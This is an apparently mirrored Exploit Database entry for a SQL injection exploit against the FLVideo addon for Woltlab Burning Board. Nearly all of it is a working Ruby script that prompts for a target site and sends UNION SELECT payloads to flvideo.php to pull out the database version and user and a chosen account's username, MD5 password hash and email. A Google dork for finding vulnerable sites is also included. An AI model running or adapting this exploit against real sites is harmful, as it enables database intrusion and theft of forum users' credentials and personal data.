Woltlab Burning Board FLVideo Addon – ‘video.php?value’ SQL Injection

• Exploit Database
• 122 阅读

• 作者： Easy Laster
  日期： 2013-09-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/28126/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111

  # Exploit Title: Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php Exploit # Google Dork: inurl:flvideo.php wbb (and more) # Date: 04.09.2013 # Exploit Author: Easy Laster # Vendor Homepage: http://www.flvideo.de/ # Version: FLVideo Addon for WBB © 2007 by Danny König # Tested on: Windows8/Backtrack   #!/usr/bin/ruby #secunet.cc #19.02.2013 #Discovered and Vulnerability by Easy Laster #flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/* #*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(version()%20as%20char)) #null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/ #**/+userid=1--+ print " ################################################################ #secunet.cc# ################################################################ #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT# #Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php # #Exploit # # Using Host+Path+id # #www.demo.de + /wbb/ + or + / + 1# # Easy Laster# #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT# ################################################################ " require 'net/http' block = "################################################################" print ""+ block +"" print "\nEnter Target Name (site.com)->" host=gets.chomp print ""+ block +"" print "\nEnter Script Path (/wbb/ or /)->" path=gets.chomp print ""+ block +"" print "\nEnter The ID From User (id)->" userid=gets.chomp print ""+ block +"" begin dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+ "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(version()%20as%20char))"+ "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+ "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+ "**/+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1]   dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+ "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(user()%20as%20char))"+ "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+ "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+ "**/+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nDatabase User-> "+(/'~'(.+)'~'/).match(resp.body)[1]   dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+ "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(userid%20as%20char))"+ "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+ "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+ "**/+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nID Account-> "+(/'~'(.+)'~'/).match(resp.body)[1]   dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+ "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(username%20as%20char))"+ "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+ "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+ "**/+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]   dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+ "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(password%20as%20char))"+ "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+ "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+ "**/+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1]   dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+ "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(email%20as%20char))"+ "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+ "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+ "**/+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1] print "\n" print ""+ block +"" print "\n" print " ################################################################ #Greetings # ################################################################ #mAdDiN, c0Re, illuministrator, WD40, peak, IRET, GabbaGandalf # #DR.zydz, HANN!BAL, 6rbk9 , Manifest, doc, cr4ck, Prof.Dr. Ogen# #ezah, enco, 4c!d And SecuNet.cc, 4004, dc3 crew, hackbase.cc# ################################################################ " rescue print "\nExploit Failed" end